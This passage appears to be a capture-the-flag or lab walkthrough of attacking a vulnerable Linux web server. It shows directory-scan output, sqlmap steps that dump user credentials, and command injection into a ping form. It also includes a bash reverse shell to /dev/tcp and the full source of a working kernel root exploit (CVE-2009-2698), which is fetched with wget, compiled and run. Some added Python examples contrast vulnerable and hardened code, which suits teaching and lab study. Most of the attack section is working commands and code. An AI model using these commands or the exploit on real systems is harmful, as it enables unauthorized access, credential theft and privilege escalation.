+ http://192.168.251.218/manual/ja/developer/index.html (CODE:200|SIZE:4770)                            
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/faq/ ----
+ http://192.168.251.218/manual/ja/faq/index.html (CODE:200|SIZE:3564)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/howto/ ----
+ http://192.168.251.218/manual/ja/howto/index.html (CODE:200|SIZE:5607)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/misc/ ----
+ http://192.168.251.218/manual/ja/misc/index.html (CODE:200|SIZE:5491)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/mod/ ----
+ http://192.168.251.218/manual/ja/mod/index.html (CODE:200|SIZE:13298)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/programs/ ----
+ http://192.168.251.218/manual/ja/programs/index.html (CODE:200|SIZE:4664)                             
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/ssl/ ----
+ http://192.168.251.218/manual/ja/ssl/index.html (CODE:200|SIZE:3957)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/developer/ ----
+ http://192.168.251.218/manual/ko/developer/index.html (CODE:200|SIZE:4770)                            
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/faq/ ----
+ http://192.168.251.218/manual/ko/faq/index.html (CODE:200|SIZE:3371)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/howto/ ----
+ http://192.168.251.218/manual/ko/howto/index.html (CODE:200|SIZE:5299)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/misc/ ----
+ http://192.168.251.218/manual/ko/misc/index.html (CODE:200|SIZE:5491)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/mod/ ----
+ http://192.168.251.218/manual/ko/mod/index.html (CODE:200|SIZE:12795)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/programs/ ----
+ http://192.168.251.218/manual/ko/programs/index.html (CODE:200|SIZE:4543)                             
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/ssl/ ----
+ http://192.168.251.218/manual/ko/ssl/index.html (CODE:200|SIZE:3988)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/developer/ ----
+ http://192.168.251.218/manual/ru/developer/index.html (CODE:200|SIZE:4770)                            
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/faq/ ----
+ http://192.168.251.218/manual/ru/faq/index.html (CODE:200|SIZE:3564)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/howto/ ----
+ http://192.168.251.218/manual/ru/howto/index.html (CODE:200|SIZE:5685)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/misc/ ----
+ http://192.168.251.218/manual/ru/misc/index.html (CODE:200|SIZE:5491)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/mod/ ----
+ http://192.168.251.218/manual/ru/mod/index.html (CODE:200|SIZE:13437)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/programs/ ----
+ http://192.168.251.218/manual/ru/programs/index.html (CODE:200|SIZE:5016)                             
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/ssl/ ----
+ http://192.168.251.218/manual/ru/ssl/index.html (CODE:200|SIZE:3988)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Sep 10 07:38:08 2024
DOWNLOADED: 262884 - FOUND: 102

2、dirsearch directory scan

dirsearch -u 192.168.251.218 -e '*' -x 400-499
-u: target URL
-e: extensions to test; * means all of them. Quote it: an unquoted * is expanded by the shell into the file names of the current directory (the "Extensions: Desktop" line in the output below is exactly that expansion)
-x: exclude status codes, comma-separated, ranges supported (400-499); the counterpart option is -i

See the dirsearch project on GitHub for more usage help.

/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                         
 (_||| _) (/_(_|| (_| )                                                                                  
                                                                                                         
Extensions: Desktop | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /root/reports/_192.168.251.218/_24-09-10_07-52-55.txt

Target: https://192.168.251.218/

[07:52:55] Starting:                                                                                     
[07:53:37] 200 -    7KB - /manual/index.html                                
[07:53:37] 301 -  321B  - /manual  ->  https://192.168.251.218/manual/      
                                                                             
Task Completed                                                                                           
                

The scan turned up only http://192.168.251.218/manual/; open it and take a look.
It is the Apache version documentation, so skip it.

Vulnerability lead 1: SQL injection

First capture a login request with Burp Suite.
Save the request to a local file and run sqlmap on it.

sqlmap -r <request file> --level 4 --risk 3

After answering y a few times, the results come out.
Two injection points were found; pick either one. Next, enumerate the database names.

sqlmap -r sqlmap --level 4 --risk 3 -p psw --dbs

Database name found; next, enumerate its tables.

sqlmap -r sqlmap --level 4 --risk 3 -p psw -D webapp --tables

Tables found; next, enumerate the columns of the table.

sqlmap -r sqlmap --level 4 --risk 3 -p psw -D webapp -T users --columns

Columns found; dump the data we need.

sqlmap -r sqlmap --level 4 --risk 3 -p psw -D webapp -T users -C "username,password" --dump

Finally we obtain two sets of valid login credentials.

User    Password
admin   5afac8d85f
john    66lajGGbla

Judging from the usernames, admin probably has higher privileges, so log in with the admin account first.
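As an added example (not code from the original post or from the Kioptrix image), a login query built the way the page's form evidently builds it, beside its parameterized form; it uses an in-memory sqlite3 database with the page's users table (username/password columns), the hypothetical request parameter psw that sqlmap injected into, and constructed sample rows.

```python
"""Added example: login query, concatenated vs. parameterized (sqlite3)."""
import sqlite3


def make_db():
    """In-memory stand-in for the webapp database; rows are constructed samples."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "sample_pw_1"), ("john", "sample_pw_2")])
    return db


def login_vulnerable(db, username, psw):
    """String concatenation: the psw value becomes part of the SQL text."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, psw))
    return [row[0] for row in db.execute(sql)]


def login_safe(db, username, psw):
    """Bound parameters: psw is always compared as a literal string."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, psw))]


def probe(db, login_fn, username, psw):
    """What a scanner observes: matching rows, or the database error text
    when the input broke the query (the signal sqlmap keys on)."""
    try:
        return ("rows", login_fn(db, username, psw))
    except sqlite3.Error as exc:
        return ("error", str(exc))
```

A stray single quote in psw produces a database error only with the concatenated query; the bound-parameter query treats the same input as an ordinary (non-matching) password.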

Vulnerability lead 2: remote command execution

After a successful login, the site redirects to a new page.
Its function: the user enters an IP address in a text box and submits it, and the site runs the ping command against that address.
First test that the function works normally.
The command runs and we get the output of "ping 192.168.251.168".
So we guess: can we append a command of our own after the address?

192.168.251.168;whoami

The command runs, and we get the name of the user the command executes as,
and the current working directory as well.
This indicates a remote command execution vulnerability.
Next, try a reverse shell command.
First run the following command in a local terminal to listen on a port.

nc -lvnp 8888

Then submit the following in the text box

192.168.251.168;bash -i >& /dev/tcp/192.168.251.168/8888 0>&1

The reverse shell connection is established.
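As an added example, not the real Kioptrix page source, here is a Python reconstruction of a ping handler that is vulnerable in exactly the way shown above (the ';' command separator) beside a hardened version that validates the address and never involves a shell; all function names are hypothetical.

```python
"""Added example: ping handler, shell-concatenated vs. validated argv."""
import ipaddress
import shlex
import subprocess


def build_ping_vulnerable(target):
    """Vulnerable form: the submitted text is pasted into a shell command line
    that the handler would run with shell=True, so ';' ends ping and starts
    whatever follows it."""
    return "ping -c 3 " + target


def shell_commands(cmdline):
    """Tokenise a command line the way a POSIX shell would and split it at
    ';' so we can see how many separate commands the shell would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token == ";":
            commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def validate_target(target):
    """Accept only a single literal IPv4/IPv6 address; reject everything else."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError("target must be a single IP address")


def build_ping_hardened(target):
    """Hardened form: validated address passed as its own argv element."""
    return ["ping", "-c", "3", validate_target(target)]


def run_hardened(target):
    """Execute without a shell, so metacharacters are never interpreted."""
    result = subprocess.run(build_ping_hardened(target),
                            capture_output=True, text=True)
    return result.returncode
```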

Vulnerability lead 3: OS kernel vulnerability

We are still the apache user and do not yet have full privileges, so next we escalate.
System files are readable.

uname -a
cat /etc/*-release

Check the system information and distribution version.

uname -a: shows the exact kernel version of the running Linux system, the distribution release in use, and the processor architecture.
cat /etc/*-release: detailed distribution version information (the file name differs slightly between distributions and there may be several such files, so the wildcard * covers all of them).
cat /etc/issue: the banner shown when connecting to the system; by default it usually contains the distribution name and similar information.

The system information is Linux 2.6, CentOS 4.5; check the exploit database for an available exploit.

searchsploit linux 2.6 centos 4.5

You can also look it up on the exploit database site.
Last time we downloaded from the exploit database; this time download through searchsploit.

searchsploit -m 9542.c

Judging by its title, the 9542.c script is more specifically targeted than 9479; when there is a choice, prefer the more specific exploit to avoid unnecessary risk.
File downloaded successfully.

cat 9542.c

Look at the script contents.
The script already gives its usage.

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
        unsigned *addr=task;
        while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
                addr++;
        }
        addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
        addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
        return;
}
void exploit();
void kernel_code()
{
        asm("exploit:\n"
                "push %eax\n"
                "movl $0xfffff000,%eax\n"
                "andl %esp,%eax\n"
                "pushl (%eax)\n"
                "call get_root_uid\n"
                "addl $4,%esp\n"
                "popl %eax\n");
        return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
        int fd=0;
        char buf[1024];
        struct sockaddr x0x;
        void *zero_page;

        uid=getuid();
        gid=getgid();
        if(uid==0){
                fprintf(stderr,"[-] check ur uid\n");
                return -1;
        }
        if(personality(0xffffffff)==PER_SVR4){
                if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
                        perror("[-] mprotect()");
                        return -1;
                }
        }
        else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
                        perror("[-] mmap()");
                        return -1;
        }
        *(unsigned long *)0x0=0x90909090;
        *(char *)0x00000004=0x90; /* +1 */
        *(char *)0x00000005=0xff;
        *(char *)0x00000006=0x25;
        *(unsigned long *)0x00000007=(unsigned long)&kernel;
        *(char *)0x0000000b=0xc3;

        if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
                perror("[-] socket()");
                return -1;
        }
        x0x.sa_family=AF_UNSPEC;
        memset(x0x.sa_data,0x82,14);
        memset((char *)buf,0,sizeof(buf));
        sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
        sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
        if(getuid()==uid){
                printf("[-] exploit failed, try again\n");
                return -1;
        }
        close(fd);
        execl("/bin/sh","sh","-i",NULL);
        return 0;
}

/* eoc */

// milw0rm.com [2009-08-31] 

Start a temporary Python HTTP server.

python -m http.server 80


Download the script from the shell. The tmp directory in Linux is for temporary files, so change to /tmp and download the script there.

cd /tmp
pwd
wget http://192.168.251.168/9542.c
ls

Download succeeded; compile the file and run it.

gcc 9542.c -o exp
./exp
whoami

Root privileges obtained.
